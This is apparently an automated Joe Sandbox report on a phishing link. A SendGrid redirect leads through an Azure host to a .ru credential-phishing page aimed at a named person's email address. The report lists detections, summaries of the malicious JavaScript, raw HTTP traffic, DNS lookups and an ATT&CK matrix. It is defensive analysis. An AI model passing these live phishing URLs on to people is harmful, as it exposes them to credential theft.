Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkz

Overview

General Information

Sample URL:https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI
Analysis ID:1615977
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected suspicious crossdomain redirect

Classification

  • System is w10x64
  • chrome.exe (PID: 5172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,8777589822983912623,9052887040892079843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/7329508157/hDzYdBaPJp/robin.kaufman@atlanticaviation.comAvira URL Cloud: Label: phishing
Source: https://nr3hz5fbqd.bazefrost.ru/liceYCYL/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://nr3hz5fbqd.bazefrost.ru/liceYCYL/#frobin.k... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external website. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of preventing analysis or obstructing security researchers.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://3484378239874382399-f4g8bka8hcb2hwfu.z02.a... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated URLs. The script generates random alphanumeric strings, constructs a new URL with the random string in the subdomain, and immediately redirects the user to the new URL. This behavior is highly suspicious and indicative of potential malicious activity, such as phishing or drive-by downloads. The use of a subdomain with a random string and the lack of transparency around the final destination URL further increase the risk score.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://nr3hz5fbqd.bazefrost.ru/liceYCYL/#frobin.k... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain, which is a clear indication of malicious intent. Additionally, the script includes aggressive DOM manipulation and attempts to disable common browser security features, further increasing the risk. Overall, this script demonstrates a high level of malicious activity and should be treated with caution.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://nr3hz5fbqd.bazefrost.ru/liceYCYL/#frobin.k... This script demonstrates high-risk behavior, including dynamic code execution via the `eval` function and potential data exfiltration. The use of obfuscated code and multiple fallback domains further increases the risk. This script should be considered highly suspicious and potentially malicious.
Source: https://nr3hz5fbqd.bazefrost.ru/liceYCYL/#workoutsHTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: u40362724.ct.sendgrid.net to https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/7329508157/hdzydbapjp/robin.kaufman@atlanticaviation.com
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D HTTP/1.1Host: u40362724.ct.sendgrid.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /7329508157/hDzYdBaPJp/robin.kaufman@atlanticaviation.com HTTP/1.1Host: 3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /liceYCYL/ HTTP/1.1Host: nr3hz5fbqd.bazefrost.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nr3hz5fbqd.bazefrost.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nr3hz5fbqd.bazefrost.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nr3hz5fbqd.bazefrost.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/324d0dcf743c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nr3hz5fbqd.bazefrost.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/324d0dcf743c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nr3hz5fbqd.bazefrost.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=AY1u4vQbN8qOCuRXIyY3H7tdq9__9oFAv6j.uwADLcg-1739648089-1.0.1.1-BJKvblxkjEhpftos9EnVBgd70BMMCx9b9aqDGEat4QoClbKAMdk7fBJZhB2tFBkj8aBhHIGN7n5G9R7g_A9.kg
Source: global trafficHTTP traffic detected: GET /gando!durwqn HTTP/1.1Host: gnfsjz.syfn-f.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://nr3hz5fbqd.bazefrost.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://nr3hz5fbqd.bazefrost.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gando!durwqn HTTP/1.1Host: gnfsjz.syfn-f.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: u40362724.ct.sendgrid.net
Source: global trafficDNS traffic detected: DNS query: 3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net
Source: global trafficDNS traffic detected: DNS query: nr3hz5fbqd.bazefrost.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: gnfsjz.syfn-f.ru
Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlSHYjedg.wo
Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlWHYg.woff2
Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlYHYjedg.wo
Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlZHYjedg.wo
Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlbHYjedg.wo
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: classification engineClassification label: mal52.win@18/23@28/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,8777589822983912623,9052887040892079843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,8777589822983912623,9052887040892079843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://gnfsjz.syfn-f.ru/gando!durwqn0%Avira URL Cloudsafe
https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/7329508157/hDzYdBaPJp/robin.kaufman@atlanticaviation.com100%Avira URL Cloudphishing
https://nr3hz5fbqd.bazefrost.ru/liceYCYL/100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
nr3hz5fbqd.bazefrost.ru
172.67.165.90
truetrue
    unknown
    code.jquery.com
    151.101.66.137
    truefalse
      high
      developers.cloudflare.com
      104.16.2.189
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.25.14
        truefalse
          high
          gnfsjz.syfn-f.ru
          188.114.97.3
          truefalse
            unknown
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              u40362724.ct.sendgrid.net
              167.89.118.118
              truefalse
                unknown
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  www.google.com
                  172.217.16.196
                  truefalse
                    high
                    3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
